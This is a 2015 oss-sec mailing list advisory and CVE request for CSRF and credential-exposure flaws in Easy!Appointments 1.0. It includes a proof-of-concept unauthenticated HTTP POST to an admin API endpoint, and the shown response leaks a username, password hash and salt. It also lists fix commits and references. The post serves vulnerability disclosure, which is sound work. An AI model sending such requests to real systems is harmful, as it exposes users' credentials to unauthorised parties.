oss-sec mailing list archives

CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities

From: Henri Salo <henri () nerv fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Easy!Appointments Open Source Appointment Scheduler
Product URL: http://easyappointments.org/
Vendor: Alex Tselegidis
Vulnerability Type:
    Cross-Site Request Forgery (CWE-352)
    Insufficiently Protected Credentials (CWE-522)
Vulnerable Versions: 1.0
Fixed Version: next release
Vendor Notification: 2015-04-03
Solution Status: Fixed by vendor
Solution Date: 2015-05-28
Public Disclosure: 2015-07-27

Vulnerability Details:

The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request. The application transmits all user credentials to unauthenticated user
and possibly allows other unauthorized actions.

Proof-of-concept without authentication:

"""
POST /ea/backend_api/ajax_filter_admins HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Iceweasel/31.6.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/ea/backend/users
Content-Length: 4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

key=
"""

Returns:

"""
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 10:28:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.4.39-0+deb7u2
Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 539

[{"id":"84","first_name":"Henri","last_name":"Salo","email":"email () example 
com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}]
"""

Fixed in following commit:                                                                                              
                                                                                                                        
                                
    https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326

Related commits to add CSRF protection:
    https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7
    https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840
    https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8
    https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54
    https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860

References:
    https://scapsync.com/cwe/CWE-352
    https://scapsync.com/cwe/CWE-522
    https://cwe.mitre.org/data/definitions/352.html
    https://cwe.mitre.org/data/definitions/522.html
    https://en.wikipedia.org/wiki/Cross-site_request_forgery
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6
FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr
tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD
vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj
QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X
N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH
OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng
mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf
vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH
jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr
Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE
++lf9BJDbx+CMendxx9Z
=cYYp
-----END PGP SIGNATURE-----
Current thread:

CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities Henri Salo (Jul 27)